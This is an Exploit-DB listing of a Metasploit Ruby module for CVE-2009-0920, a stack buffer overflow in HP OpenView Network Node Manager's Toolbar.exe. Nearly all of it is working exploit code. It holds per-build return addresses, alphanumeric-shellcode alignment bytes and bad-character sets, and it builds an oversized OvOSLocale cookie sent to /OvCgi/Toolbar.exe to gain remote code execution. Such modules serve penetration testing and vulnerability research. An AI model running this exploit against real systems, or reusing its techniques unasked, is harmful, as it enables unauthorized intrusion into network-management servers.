HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Cookie Handling Buffer Overflow (Metasploit)

EDB-ID:

17537

CVE:

2009-0920

EDB Verified:

Author:

Metasploit

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2011-07-16

Vulnerable App: 
##
# $Id: hp_nnm_toolbar_02.rb 13194 2011-07-16 05:21:20Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0
				and 7.53.  By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an
				attacker may be able to execute arbitrary code.  Please note that this module only works
				against a specific build (ie. NNM 7.53_01195)
			},
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13194 $',
			'Author'         =>
				[
					'Oren Isacson', # original discovery
					'juan vazquez', # metasploit module (7.0 target)
					'sinn3r',       # 7.53_01195 target
				],
			'References'     =>
				[
					[ 'CVE', '2009-0920' ],
					[ 'OSVDB', '53242' ],
					[ 'BID', '34294' ],
					[ 'URL', 'http://www.coresecurity.com/content/openview-buffer-overflows']
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'          => 4000,
					'BadChars'       => "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f\x3b\x2b",
					'DisableNops'    => true, # no need
					'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
					'EncoderOptions' =>
					{
						'BufferRegister' => 'EDX'
					}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						#Windows XP SP3
						'HP OpenView Network Node Manager Release B.07.00',
						{
							'Ret' => 0x5A212147, # ovsnmp.dll call esp
							'Offset' => 0xFC,  # until EIP
							# Pointer to string with length < 0x100
							# Avoid crash before vulnerable function returns
							# And should work as a "NOP" since it will prepend shellcode
							#'ReadAddress' => 0x5A03A225,# ov.dll
							'ReadAddress' => 0x5A03A225,# ov.dll
							'EDXAdjust' => 0x17,
							# 0x8 => offset until "0x90" nops
							# 0x4 => "0x90" nops
							# 0x2 => len(push esp, pop edx)
							# 0x3 => len(sub)
							# 0x6 => len(add)
						}
					],
					[
						#Windows Server 2003
						'HP OpenView Network Node Manager 7.53 Patch 01195',
						{
							'Eax'       => 0x5a456eac,   #Readable address for CMP BYTE PTR DS:[EAX],0
							'EaxOffset' => 251,          #Offset to overwrite EAX
							'Ret'       => 0x5A23377C,   #CALL EDI
							'Max'       => 8000,         #Max buffer size
						}
					]
				],
			'DisclosureDate' => 'Jan 21 2009'))

		register_options( [ Opt::RPORT(80) ], self.class )
	end

	def exploit

		if target.name =~ /7\.53/

			#EDX alignment for alphanumeric shellcode
			#payload is in EDI first.  We exchange it with EDX, align EDX, and then
			#jump to it.
			align  = "\x87\xfa"      #xchg edi,edx
			align << "\x80\xc2\x27"  #add dl,0x27
			align << "\xff\xe2"      #jmp edx

			#Add the alignment code to payload
			p = align + payload.encoded

			sploit  = 'en_US'
			sploit << rand_text_alphanumeric(247)
			sploit << [target.ret].pack('V*')
			sploit << rand_text_alphanumeric(target['EaxOffset']-sploit.length+'en_US'.length)
			sploit << [target['Eax']].pack('V*')
			sploit << rand_text_alphanumeric(3200)
			sploit << make_nops(100 - align.length)
			sploit << align
			sploit << p
			sploit << rand_text_alphanumeric(target['Max']-sploit.length)

		elsif target.name =~ /B\.07\.00/

			edx = Rex::Arch::X86::EDX

			sploit = "en_US"
			sploit << rand_text_alphanumeric(target['Offset'] - "en_US".length, payload_badchars)
			sploit << [target.ret].pack('V')
			sploit << [target['ReadAddress']].pack('V')
			sploit << "\x90\x90\x90\x90"
			# Get in EDX a pointer to the shellcode start
			sploit << "\x54" # push esp
			sploit << "\x5A" # pop edx
			sploit << Rex::Arch::X86.sub(-(target['EDXAdjust']), edx, payload_badchars, false, true)
			sploit << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000
			sploit << payload.encoded

		end

		#Send the malicious request to /OvCgi/ToolBar.exe
		#If the buffer contains a badchar, NNM 7.53 will return a "400 Bad Request".
		#If the exploit causes ToolBar.exe to crash, NNM returns "error in CGI Application"
		send_request_raw({
			'uri'     => "/OvCgi/Toolbar.exe",
			'method'  => "GET",
			'cookie'  => "OvOSLocale=" + sploit + "; OvAcceptLang=en-usa",
		}, 20)

		handler
		disconnect
	end

end


=begin
NNM B.07.00's badchar set:
00 0D 0A 20 3B 3D 2C 2B

NNM 7.53_01195's badchar set:
01 02 03 04 05 06 07 08 0a 0b 0c 0d 0e 0f 10 11    ................
12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f       ...............
3b = delimiter
2b = gets converted to 0x2b
=end
Copy
Tags: Metasploit Framework (MSF)
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services